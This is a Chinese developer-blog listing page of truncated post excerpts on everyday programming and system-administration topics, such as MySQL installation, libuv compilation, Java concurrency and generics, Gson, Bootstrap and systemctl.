文本函数 CHAR CHAR(number):根据指定数字返回对应的字符。CHAR函数可将计算机其他类型的数字代码转换为字符。 Number:用于指定字符的数字，介于1Number:用于指定字符的数字，介于165535之间（包括1和65535）。示例: CHAR(88)等于“X”。 CHAR(45)等于“-”。 CODE CODE(text):计算文本串中第一个字
mysql安装出错林鹤霄 mysql安装
[root@localhost ~]# rpm -ivh MySQL-server-5.5.24-1.linux2.6.x86_64.rpm Preparing... #####################
linux下编译libuv aigo libuv
下载最新版本的libuv源码，解压后执行： ./autogen.sh 这时会提醒找不到automake命令，通过一下命令执行安装（redhat系用yum，Debian系用apt-get）： # yum -y install automake # yum -y install libtool 如果提示错误：make: *** No targe
中国行政区数据及三级联动菜单 alxw4616
近期做项目需要三级联动菜单,上网查了半天竟然没有发现一个能直接用的! 呵呵,都要自己填数据....我了个去这东西麻烦就麻烦的数据上. 哎,自己没办法动手写吧. 现将这些数据共享出了,以方便大家.嗯,代码也可以直接使用文件说明 lib\area.sql -- 县及县以上行政区划分代码（截止2013年8月31日)来源：国家统计局发布时间：2014-01-17 15:0
哈夫曼加密文件百合不是茶哈夫曼压缩哈夫曼加密二叉树
在上一篇介绍过哈夫曼编码的基础知识,下面就直接介绍使用哈夫曼编码怎么来做文件加密或者压缩与解压的软件,对于新手来是有点难度的,主要还是要理清楚步骤; 加密步骤: 1,统计文件中字节出现的次数,作为权值 2,创建节点和哈夫曼树 3,得到每个子节点01串 4,使用哈夫曼编码表示每个字节
JDK1.5 Cyclicbarrier实例 bijian1013 java thread java多线程 Cyclicbarrier
CyclicBarrier类一个同步辅助类，它允许一组线程互相等待，直到到达某个公共屏障点 (common barrier point)。在涉及一组固定大小的线程的程序中，这些线程必须不时地互相等待，此时 CyclicBarrier 很有用。因为该 barrier 在释放等待线程后可以重用，所以称它为循环的 barrier。 CyclicBarrier支持一个可选的 Runnable 命令，
九项重要的职业规划 bijian1013 工作学习
一. 学习的步伐不停止古人说，活到老，学到老。终身学习应该是您的座右铭。世界在不断变化，每个人都在寻找各自的事业途径。您只有保证了足够的技能储
【Java范型四】范型方法 bit1129 java
范型参数不仅仅可以用于类型的声明上，例如 package com.tom.lang.generics; import java.util.List; public class Generics<T> { private T value; public Generics(T value) { this.value =
【Hadoop十三】HDFS Java API基本操作 bit1129 hadoop
package com.examples.hadoop; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FSDataInputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoo
ua实现split字符串分隔 ronin47 lua split
LUA并不象其它许多"大而全"的语言那样，包括很多功能，比如网络通讯、图形界面等。但是LUA可以很容易地被扩展：由宿主语言(通常是C或 C++)提供这些功能，LUA可以使用它们，就像是本来就内置的功能一样。LUA只包括一个精简的核心和最基本的库。这使得LUA体积小、启动速度快，从而适合嵌入在别的程序里。因此在lua中并没有其他语言那样多的系统函数。习惯了其他语言的字符串分割函
java-从先序遍历和中序遍历重建二叉树 bylijinnan java
public class BuildTreePreOrderInOrder { /** * Build Binary Tree from PreOrder and InOrder * _______7______ / \ __10__ ___2 / \ / 4
openfire开发指南《连接和登陆》开窍的石头 openfire 开发指南 smack
第一步官网下载smack.jar包下载地址：http://www.igniterealtime.org/downloads/index.jsp#smack 第二步把smack里边的jar导入你新建的java项目中开始编写smack连接openfire代码 p
[移动通讯]手机后盖应该按需要能够随时开启 comsci 移动
看到新的手机，很多由金属材质做的外壳，内存和闪存容量越来越大，CPU速度越来越快，对于这些改进，我们非常高兴，也非常欢迎但是，对于手机的新设计，有几点我们也要注意第一：手机的后盖应该能够被用户自行取下来，手机的电池的可更换性应该是必须保留的设计,
20款国外知名的php开源cms系统 cuiyadll cms
内容管理系统，简称CMS，是一种简易的发布和管理新闻的程序。用户可以在后端管理系统中发布，编辑和删除文章，即使您不需要懂得HTML和其他脚本语言，这就是CMS的优点。在这里我决定介绍20款目前国外市面上最流行的开源的PHP内容管理系统，以便没有PHP知识的读者也可以通过国外内容管理系统建立自己的网站。 1. Wordpress WordPress的是一个功能强大且易于使用的内容管
Java生成全局唯一标识符 darrenzhu java uuid unique identifier id
How to generate a globally unique identifier in Java http://stackoverflow.com/questions/21536572/generate-unique-id-in-java-to-label-groups-of-related-entries-in-a-log http://stackoverflow
php安装模块检测是否已安装过, 使用的SQL语句 dcj3sjt126com sql
SHOW [FULL] TABLES [FROM db_name] [LIKE 'pattern'] SHOW TABLES列举了给定数据库中的非TEMPORARY表。您也可以使用mysqlshow db_name命令得到此清单。本命令也列举数据库中的其它视图。支持FULL修改符，这样SHOW FULL TABLES就可以显示第二个输出列。对于一个表，第二列的值为BASE T
5天学会一种 web 开发框架 dcj3sjt126com Web 框架 framework
web framework层出不穷，特别是ruby/python,各有10+个,php/java也是一大堆根据我自己的经验写了一个to do list,按照这个清单，一条一条的学习，事半功倍，很快就能掌握一共25条，即便很磨蹭，2小时也能搞定一条，25*2=50。只需要50小时就能掌握任意一种web框架各类web框架大同小异:现代web开发框架的6大元素，把握主线，就不会迷路建议把本文
Gson使用三(Map集合的处理,一对多处理) eksliang json gson Gson map Gson 集合处理
转载请出自出处：http://eksliang.iteye.com/blog/2175532 一、概述 Map保存的是键值对的形式，Json的格式也是键值对的，所以正常情况下，map跟json之间的转换应当是理所当然的事情。二、Map参考实例 package com.ickes.json; import java.lang.refl
cordova实现“再点击一次退出”效果 gundumw100 android
基本的写法如下： document.addEventListener("deviceready", onDeviceReady, false); function onDeviceReady() { //navigator.splashscreen.hide(); document.addEventListener("b
openldap configuration leaning note iwindyforest configuration
hostname // to display the computer name hostname <changed name> // to change go to: /etc/sysconfig/network, add/modify HOSTNAME=NEWNAME to change permenately dont forget to change /etc/hosts
Nullability and Objective-C 啸笑天 Objective-C
https://developer.apple.com/swift/blog/?id=25 http://www.cocoachina.com/ios/20150601/11989.html http://blog.csdn.net/zhangao0086/article/details/44409913 http://blog.sunnyxx
jsp中实现参数隐藏的两种方法 macroli JavaScript jsp
在一个JSP页面有一个链接，//确定是一个链接?点击弹出一个页面，需要传给这个页面一些参数。//正常的方法是设置弹出页面的src="***.do?p1=aaa&p2=bbb&p3=ccc"//确定目标URL是Action来处理?但是这样会在页面上看到传过来的参数，可能会不安全。要求实现src="***.do"，参数通过其他方法传！//////
Bootstrap A标签关闭modal并打开新的链接解决方案 qiaolevip 每天进步一点点学习永无止境 bootstrap 纵观千象
Bootstrap里面的js modal控件使用起来很方便，关闭也很简单。只需添加标签 data-dismiss="modal" 即可。可是偏偏有时候需要a标签既要关闭modal，有要打开新的链接，尝试多种方法未果。只好使用原始js来控制。 <a href="#/group-buy" class="btn bt
二维数组在Java和C中的区别流淚的芥末 java c 二维数组数组
Java代码： public class test03 { public static void main(String[] args) { int[][] a = {{1},{2,3},{4,5,6}}; System.out.println(a[0][1]); } } 运行结果： Exception in thread "mai
systemctl命令用法 wmlJava linux systemctl
对比表，以 apache / httpd 为例任务旧指令新指令使某服务自动启动 chkconfig --level 3 httpd on systemctl enable httpd.service 使某服务不自动启动 chkconfig --level 3 httpd off systemctl disable httpd.service 检查服务状态 service h